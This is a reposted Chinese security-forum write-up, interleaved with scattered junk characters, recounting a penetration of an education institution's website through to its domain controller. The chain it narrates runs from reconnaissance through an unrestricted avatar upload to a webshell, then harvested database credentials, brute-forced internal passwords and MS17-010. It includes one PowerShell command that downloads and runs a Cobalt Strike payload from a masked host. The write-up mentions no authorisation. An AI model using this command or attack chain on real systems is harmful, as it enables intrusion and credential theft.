|
5 f9 u6 @; _3 ?5 X 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
1 }: T: R, f5 m/ s( o% _; N
5 N/ C7 ^8 X- @6 u3 ?9 p4 _- c# W L$ s4 P
1 |; w. {/ @+ Q0 `, B: W( I $ `0 J8 k. F/ Z p% }" P! T: ]+ Q
2 @( q7 G# ~- G! b, v h0 \4 t
正文, v) ]% m: p' D) f
% ^* g, e1 W H+ N5 V4 V( E4 F1 ]# k8 @
- f% A" ]: y f* J# ?% E, S& B/ N' t
# K6 _% P/ ^6 t* s7 E a % v1 ^5 ]9 s8 @" i
" ~6 m% ^- O W) H0 o; [
目标:www.xxxx.com(一家教育机构)
; ]. s$ b" v# T
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能) R w8 S' r! f! e* p
: _. \! B/ y' h% N& k
: E% X; @1 o8 k1 Z 
! [6 c* G: @& m5 @( l+ _0 i
+ v0 U% f* P9 X% w
; S( `! s1 D* R 进行了简单的信息搜集
- `; I: L* L6 {: B. @, _) |) T
K3 K( x( Y$ W3 W9 T, _
( k! Z% d5 s% I * p# d1 p) ^) f
/ m% Y) Z2 |. [( {& L* A 子域名搜集' p, S4 a2 x8 x3 B- a7 p: q' K
+ n; k# W q* N9 e1 b) n
& T+ v5 F( X/ D. e 
6 [$ U! g1 j z% K- w7 {
( {0 X4 |8 s: \ n) D4 w* Z1 ~0 O Y1 r$ |2 u) a4 k/ [' l' o
fofa找资产
) G7 E( V* g/ O0 @6 e
1 h; n! }4 g) S4 Y9 }2 {" A c5 Q) ]! j! ~
K; X& E& @8 P( ~# V" `; X8 @; N, Y* l7 C
) U' |( \6 p* R' h/ J
# Q$ J2 f* y8 f8 F/ H, W# ^7 b, S8 e2 A) u8 D, T) ^1 P
一共七个资产。去重之后只有两个。
) ~4 K& i$ E0 i
! Z4 [" ~4 X1 e* G- b9 b9 _) E: X4 X# W! M
- |. t9 g$ y& |: v! i0 [
* N+ I% l) @) S 目录探测
: f: l d. z$ J1 x5 ~ / d, C' s z" Q: q
# K+ x' f" M% Y
 3 }" [. H" [$ S2 B3 s" `4 r; I/ t
6 \ B/ a2 X/ L W+ y7 |' E8 R Z, G8 C( a: a5 B8 W. ?
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
, W& G o& }9 P# ?2 M
/ T, k' s U7 m, H2 h
( ?2 e: w1 o7 X4 T0 x0 w/ D
- a @0 `0 c( [; q% P4 M6 d
$ V H0 ^% l! U4 l; E 我又尝试了通过修改返回包来绕过登录界面) b9 X! Y9 j% d7 P [5 |
2 E J2 i5 N0 I5 h6 \; b
( P7 N! q$ d9 M  0 ]/ P% f5 b, P. [. {2 i! b
9 N, G3 ?" S. Z0 y! W, J5 _- k$ U" r
还是不行,尝试注入无果
6 j" w( F* k P3 h! I" u
L, J1 R$ T8 z" L+ M0 p. E
4 b9 ?# F5 E2 e 
- y) h' Q7 }* g. X ' Z: @/ i- u- P ?) N2 X
9 W- i/ `% R- m
不过我目录探测出了一处Spring信息泄露
% Z8 v8 S7 S. A1 C3 P7 y
: n* z# ?8 A$ ?- m8 g: e! W- p0 \$ i& L0 Q9 j* E A0 A0 m7 T
o- C0 _: g' Z. `1 u3 A) Q
; H, b' X, w* Z1 g' V  * M; |" `: C* C! p4 {
j/ d9 U& P# h7 `0 X- B: [9 B' W2 x$ u
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
% H2 ]6 e0 P$ v- B8 R : t3 Y' t' V: A- t- N& R! A/ m
. J! C& H$ W4 ~" {1 @9 T' N- n7 Q  3 d7 W3 `# J3 R
. E5 [ o3 K% U$ K, }5 @- b
h8 l" h e1 D9 U# U
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。8 t' x* G) b, N; I! j, w
- S$ D' G/ J6 ^3 a' V- `4 h) Z9 u" c3 N, q
 9 ~$ L! J7 I2 I+ c$ C" u$ g
" ^: K. Y- k+ s8 m# @* u9 P- G8 M
' N$ t* z* g6 g# z% U+ P; ?+ f. e 获取有些师傅到这一步就手机抓包电脑测了。' M6 I& ~) Z4 l+ p) y
1 A9 [+ X( w4 M) X
. e) Q. g% | q; d7 D( z+ B Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。* @. u4 m! Z4 d) X
: y: n9 i; ~: L3 G6 a0 N
: O; Y% r; f! c# X8 x$ s
其中在一个公众号发现了小程序,可以进行注册。
2 Z8 F+ g3 J- S3 b! ~& j : k! y+ {/ `& |' q
1 D3 Z( B- _! x3 n3 N& K
看到了头像上传,尝试上传获取WebShell' r3 H8 ^' g, `- U. U% r, f
2 e+ V F1 A5 q/ w1 _
8 b( ?- P0 k2 h" U) }
" M( A" C8 @' C* i- o0 X 0 h8 N9 v7 Q+ Q2 F) s4 u& [% }
5 C" a( T1 `: j3 {: n8 e' {0 y 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
4 N) r, a- d; ?$ k S4 Z/ q 2 y" Q* `( l @8 [6 s
0 F) L& C% M6 P3 i6 t: b7 D. o3 D9 a  / Z( B/ X i3 n$ ?. l3 ^
$ a2 k/ s! D1 h+ V2 e7 V9 h0 t# m9 z! y# i7 M d, a1 N
然后上了大马7 H) K( M& Y- l9 e9 I
9 W2 d8 r* z+ r+ ?
" ~5 D* [/ |" F. t8 P0 L 
2 d/ Q4 U) j2 w, Y& o+ ~- v/ K A 0 A- z* ?* [% D A1 w
+ q7 ?( |- Y4 B6 p6 o& ~ 
* h. K9 Y y6 }7 O
$ C, T3 M+ Q4 B' Y. f& a& A: G" _
7 [7 n6 U6 ]% S( y& E9 C 通过翻找文件发现数据库账号密码
( F" Z9 T2 U7 b9 n B1 x% D' k
( x1 C7 K' ^" C1 O$ m7 m% T: h. u: W2 c$ @
 6 ?; Z7 Z. h- E& l
# {& ]! Y7 W& C+ d( Z' b3 \3 J
--内网渗透8 i* B! d+ P9 \0 p
1 p& e6 N8 q. a! O
8 d- S) z( Z' h( S0 S) M8 Z
直接通过powershell执行 cs上线; s8 }) N8 @6 G& x- M4 `1 i
: g; d% F$ t% f' f/ \( Q8 N* T
) y. q3 S6 \# N1 C( p. T! M powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"6 }, S' {" ?! Z' n) H+ }5 u9 _
8 A9 D5 e3 O. y2 d
' F0 p% K6 }+ @) u1 Z0 n" ^
5 b* J) b [) J( w6 @ t; C+ B ! R4 _% X: i; t7 l- g+ n+ [
8 v6 B$ S' J8 h 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
9 M- f3 S2 e& K) D; f. [% v " i& M& i, u! G. P D' Z
2 y) ?8 R. x$ d
 - e5 _5 i# s" j: G1 M: `
3 B6 t c6 r Y8 V+ i, a
( ^4 R0 _, E2 J+ U$ T* U 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 j8 [: B+ B6 [% G1 \! D$ e5 _; Z
! m& D, e8 A* O& f
2 y4 W% x/ d( Q* z( ]# c9 S3 b- d" `
S2 e0 @- U! m5 M$ t3 m# {
. [4 F" F& C* N( J+ [' _& k2 W y3 R  ' I1 m! B2 L% U( y. r: w
/ t4 y/ W7 k" r8 O( a
% |4 w/ @$ U v% \, i* n
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 J2 { P2 ~* X
' e* [* O4 l4 R5 s0 g2 z
+ L$ X2 C, c9 Y* _2 I+ J' O
. C1 f3 w# k7 x) E+ x
D6 u$ f6 G0 {) i; K. z 
2 ]/ Y4 C m$ D8 k: q( w ; X! J7 ?# F6 n% A1 u
7 V# K( ?3 I3 n' @" f
9 H l, c$ `+ |1 [: T& D$ V) C% R" a
+ }% Q) \0 Q$ Q0 M- A. O0 y6 i
7 U, |# w9 w* S1 x, j
0 w' c1 v& g. i. W
( e1 x9 d8 F' O
( N! L2 n/ F: Q: ]; k
/ h! W* ]$ S! `: j7 X M
, c) @+ J4 K, e0 { 小结
r1 S1 j% J( j. U" T+ V
* b* j0 Y) r! j% k0 r( m, h* |0 o3 j2 K+ h+ j' d
, K, V# e$ S0 Q* g- y
+ ^9 E/ S. i4 K+ y
5 C$ ^9 r/ g/ a8 \8 W) S
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
. Q, G% w* r" A) X/ x, C
4 O" T( D; P' I! ^+ a1 Q' \$ j$ d2 n2 y$ d! @- |+ W1 P; g
% ~- G! G) L9 j+ m8 D( D
4 R9 I1 X) m# G ?) g; |9 H4 P
% X8 P# f& |8 Q1 ~
- ( y$ r/ b8 _' q7 a9 w
; d$ G3 F$ ? r/ h* L
2 L" d0 k# l) A4 V7 z! M: b
-
# t0 z/ W. R( e) C
3 W, A2 o! o- b4 Z* n2 a
2 w8 _) j& y$ d7 i2 O
0 N' R, O2 e0 T% p" L% j
: `$ F, u* h; R. S- C 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
+ C$ r4 v2 B2 R+ y5 A4 ^ ; ~; _! a# h2 B/ F v2 G
4 p: _3 K! m3 z+ m, B9 }% y 6 K- c- c! j! g P% j
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对